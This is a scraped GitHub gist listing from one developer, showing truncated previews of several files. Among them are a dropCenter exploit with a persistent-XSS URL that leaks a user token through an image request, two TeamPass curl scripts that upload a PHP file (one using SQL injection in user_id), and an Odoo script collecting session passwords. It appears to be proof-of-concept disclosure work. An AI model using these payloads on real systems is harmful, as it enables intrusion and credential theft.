Cette sonde permet de vérifier des sites web :
- vérification du HTTP Status Code (2xx)
- vérification de la présence d'un terme dans la page
- vérification du temps de chargement
Simon Leblanc leblanc-simon
leblanc-simon
/ README.md
Last active
September 25, 2016 02:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Verifying that +leblanc_simon is my blockchain ID. https://onename.com/leblanc_simon |
leblanc-simon
/ dropcenter_exploit.php
Last active
December 21, 2015 11:49
XSS + privilege escalation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| # Exploit Title: dropCenter all version : privilege escalation | |
| # If this is the last version (after 2013-08-20), use permanent XSS to hack the website : | |
| # | |
| # - Encoded URL : http://localhost/dropCenter/index.php?error=%22%29%3B%24%28document%29.ready%28function%28%29%7B%24%28%27body%27%29.append%28%27%3Cimg+src%3D%22http%3A%2F%2Flocalhost%2Fdropcenter_exploit.php%3Fuser%3D%27%2B%24%28%27form%5Baction%5E%3D%22php%2Faction.php%3Faction%3DsaveSettings%22%5D%27%29.attr%28%27action%27%29.match%28%2Fuser%3D%28.%2A%29%2F%29%5B1%5D%2B%27%22%2F%3E%27%29%7D%29%3Bfunction+test%28%29%7B%7Dtest%28%22 | |
| # | |
| # - Decoded URL : http://localhost/dropCenter/index.php?error=");$(document).ready(function(){$('body').append('<img src="http://localhost/dropcenter_exploit.php?user='+$('form[action^="php/action.php?action=saveSettings"]').attr('action').match(/user=(.*)/)[1]+'"/>')});function test(){}test(" | |
| # | |
| # Date: 2013-08-02 | |
| # Author: leviathan |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| Usage of API : | |
| - Search / Get links : | |
| * method: GET | |
| * URL : ?do=api (add &token=[hash_hmac(sha256, api_key, api_hash)] to add private link in search) | |
| * return: JSON (object or array) | |
| * &key=[linkdate]: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import os | |
| from werkzeug.contrib.sessions import FilesystemSessionStore | |
| session_store = FilesystemSessionStore(os.path.expanduser('~/.local/share/Odoo/sessions')) | |
| passwds = [] | |
| for sid in session_store.list(): | |
| session = session_store.get(sid) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from prestapyt import PrestaShopWebServiceError, PrestaShopWebService, PrestaShopWebServiceDict | |
| prestashop = PrestaShopWebServiceDict('http://localhost/api', '098F6BCD4621D373CADE4E832627B4F6') | |
| prestashop.search('addresses') # 401 + 200 : OK, it's the first call | |
| prestashop.get('addresses', 4) # 200 only: OK | |
| prestashop.get('addresses', 6) # 200 only: OK | |
| prestashop.search('orders') # 401 + 200 : NOK, it must be only 200 | |
| prestashop.get('orders', 2) # 200 only: OK | |
| prestashop.get('orders', 5) # 200 only: OK |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $url = 'http://localhost/teampass/'; | |
| $curl = curl_init(); | |
| curl_setopt($curl, CURLOPT_URL, $url.'includes/libraries/uploadify/uploadify.php?key_tempo=lol&user_id='.urlencode('0 UNION SELECT \'lol\'')); | |
| curl_setopt($curl, CURLOPT_POST, true); | |
| $post = array( | |
| 'Filedata' => '@info.php', | |
| 'type_upload' => 'import_items_from_csv', | |
| 'folder' => '/teampass/files', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $url = 'http://localhost/nilsteampassnet-TeamPass-65f3167/'; | |
| $curl = curl_init(); | |
| curl_setopt($curl, CURLOPT_URL, $url.'includes/libraries/uploadify/uploadify.php'); | |
| curl_setopt($curl, CURLOPT_POST, true); | |
| $post = array( | |
| 'Filedata' => '@info.php', | |
| 'type_upload' => 'import_items_from_csv', | |
| 'folder' => '/nilsteampassnet-TeamPass-65f3167/files', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Project name | |
| propel.project = OpenSondage | |
| # Database driver | |
| propel.database = mysql | |
| propel.mysql.tableType = MyISAM | |
| propel.mysql.tableEngineKeyword = ENGINE | |
| propel.tablePrefix = | |
| ################################################# |
leblanc-simon
/ keybase.md
Created
May 26, 2015 21:37
I hereby claim:
- I am leblanc-simon on github.
- I am leblancsimon (https://keybase.io/leblancsimon) on keybase.
- I have a public key whose fingerprint is 181A E85C 78A3 4464 896C 8CBB 3825 AC59 FCD3 3571
To claim this, I am signing this object: